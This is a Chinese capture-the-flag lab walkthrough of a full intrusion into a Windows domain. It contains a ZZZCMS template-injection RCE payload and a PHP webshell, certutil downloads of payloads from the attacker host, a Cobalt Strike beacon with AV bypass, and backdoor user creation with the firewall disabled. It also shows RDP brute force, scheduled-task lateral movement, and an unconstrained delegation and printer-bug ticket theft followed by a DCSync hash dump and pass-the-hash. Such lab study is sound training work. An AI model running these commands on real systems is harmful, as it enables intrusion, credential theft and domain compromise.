cyber-lab8


lab8

精简思路

1
这个靶场非常质量,先拿zzzcms的shell,由于有杀毒软件,绕过后用powershellpayload上线cs,绕后添加用户登入后,然后爆破33主机登入,tcp beacon正向连接转发上线,然后非约束委派+打印机漏洞偷66主机域控hash,然后hash传递拿flag3

Zzzcms 1.61 后台远程命令执行漏洞-flag1

先fscan扫描全端口

image-20260115142224285

80端口就是一个zzzcms,/admin到后台登入页面,然后admin/admin123456进入后台,然后打Zzzcms 1.61 后台远程命令执行漏洞

再谈 zzzcms 代码执行,你也能审计出来的高危漏洞-腾讯云开发者社区-腾讯云

1
{if:assert($_request[phpinfo()])}phpinfo();{end if}

image-20260115142802145

image-20260115142939630

然后打一句话木马,蚁剑连接

1
{if:assert($_POST[x])}phpinfo();{end if}

这里必须要选base64才能连上

image-20260115144514763

然后根目录拿到flag1

Cyberstrikelab-Lab8 · HYH’s Blog

PowerShell Payload绕过杀毒上线cs

之后就添加用户吧,但是不是system权限,所以要先提权才能添加用户,那就要上线cs了,那之后就在kali打(本地打,cs打不了,客户端放本地,服务端只能放kali两个连不上)

1
sudo openvpn --config cyberstrikelab-lab8.ovpn --keepalive 10 60 --route-nopull --route 172.50.12.33 255.255.255.255 &

在蚁剑执行tasklist /SVC,然后识别进程,发现又杀毒软件

image-20260115154118726

直接生成的cs木马会被直接杀掉,这里用这个插件https://github.com/hack2fun/BypassAV,然后直接上传会超时,这里起一个http服务,然后用certutil.exe远程下载

1
certutil.exe -urlcache -split -f http://172.16.233.2/artifact_x64.exe artifact_x64.exe

image-20260115155935231

但是我咋运行都死活上不了线,不过!那就不上线exe了,生成 PowerShell Payload

image-20260115162347833

然后蚁剑打就上线了

image-20260115162436967

然后利用cs的自带插件提权,具体看

CobaltStrike4.8汉化版带插件-CSDN博客

用插件juicypotato模块提升至system权限(甜土豆失败了)

image-20260115163715092

然后就添加用户,远程登入呗

1
2
3
4
shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
shell net user hack Admin@123 /add
shell net localgroup Administrators hack /add
shell netsh firewall set opmode disable
1
xfreerdp /u:hack /p:'Admin@123' /v:172.50.12.33 /cert:ignore /tls-seclevel:0 /drive:share,/mnt/xpw/kali_shard

登入发现了360,把他关了,方便之后的fscan扫描

image-20260115164529780

上传stowaway不能直接上传exe,那就先通过压缩包上传zip win_agent.zip win_agent.exe然后上传,当然可以直接上传

1
certutil.exe -urlcache -split -f http://172.16.233.2/win_agent.exe win_agent.exe

然后搭建代理

1
2
./linux_x64_admin -l 172.16.233.2:8000 -s 123
win_agent.exe -c 172.16.233.2:8000 -s 123 --reconnect 8

image-20260115165800866

然后fscan开扫

image-20260115170039449

没扫到啥,对33主机进行全端口扫描,发现3389开放

image-20260115170215977

那就是爆破

1
proxychains4 hydra -l administrator -P pass.txt rdp://10.5.5.33 -Vv

image-20260115170859169

得到密码admin@123456,然后远程登入,得到flag2

1
proxychains4 xfreerdp /u:administrator /p:'admin@123456' /v:10.5.5.33 /cert:ignore /tls-seclevel:0 /drive:share,/mnt/xpw/kali_shard

image-20260115185726035

tcp beacon正向连接上线-svc提权

然后转发上线cs,先转发代理,然后生成exe,放到33主机桌面上了

image-20260115193305944

与目标主机建立IPC$连接:

1
shell net use \\10.5.5.33\C$ "admin@123456" /user:Administrator

image-20260115193954045

然后测试一下是否连接

1
shell dir "\\10.5.5.33\C$\Users\Administrator\Desktop\"

image-20260115194018882

远程创建目标主机计划任务执行木马:

1
shell schtasks /create /s 10.5.5.33 /u Administrator /p "admin@123456" /sc MINUTE /mo 1 /tn test /tr "C:\Users\Administrator\Desktop\lab8_z.exe"

失败,这逆向连接失败,那我正向连接,tcp正向连接是利用已上线跳板机主动与上传了木马的目标主机建立tcp连接,从而上线目标主机。设置一个tcp正向连接的监听器:

image-20260115195648654

使用tcp正向连接的监听器生成stageless木马,然后还是是上面一样,还是利用跳板机与目标主机建立IPC$连接

1
shell net use \\10.5.5.33\C$ "admin@123456" /user:Administrator

上传后管理员程序运行,然后再跳板机运行这

1
connect 10.5.5.33 4444

image-20260115200547576

内网渗透之不出网上线CobaltStrike技巧 - smileleooo - 博客园

输入elevate,发现可提权的模块, svc-exe

image-20260115202228048

然后建一个用 SMB 监听器。

image-20260115203814393

然后打

1
elevate svc-exe smb

image-20260115203754622

非约束委派 + 打印机漏洞

查询当前域内的非约束委派用户

1
shell C:\\Users\\Administrator\\Desktop\\AdFind.exe -b "DC=cyberstrikelab,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

image-20260115213126021

也就是cyberweb用户是非约束委派,上传Rubeus监听来自域控的票据

1
2
# 使用Rubeus监听来自域控的票据
shell C:\\Users\\Administrator\\Desktop\\Rubeus.exe monitor /interval:2 /filteruser:DC$

image-20260115212541788

利用打印机漏洞(SpoolSample)或类似攻击让域控主动连接非约束委派机器,从而生成并发送Kerberos票据给攻击者控制机器。

1
shell SpoolSample.exe DC CYBERWEB

用rubeus导入票据

1
shell C:\\Users\\Administrator\\Desktop\\Rubeus.exe ptt /ticket:<ticket>

mimikatz导出哈希,然后打哈希传递

1
shell C:\\Users\\Administrator\\Desktop\\mimikatz.exe  "lsadump::dcsync /domain:cyberstrikelab.com /user:cyberstrikelab\Administrator" "exit"
1
proxychains4 crackmapexec smb 10.5.5.66 -u administrator -H 9d880175be3fc0e75ebb9686f482cfa5  -d cyberstrikelab.com -x "type C:\\flag.txt"

image-20260115211631675

奇安信攻防社区-红队域渗透技术:委派攻击汇总(全)

谢谢观看
使用 Hugo 构建
主题 StackJimmy 设计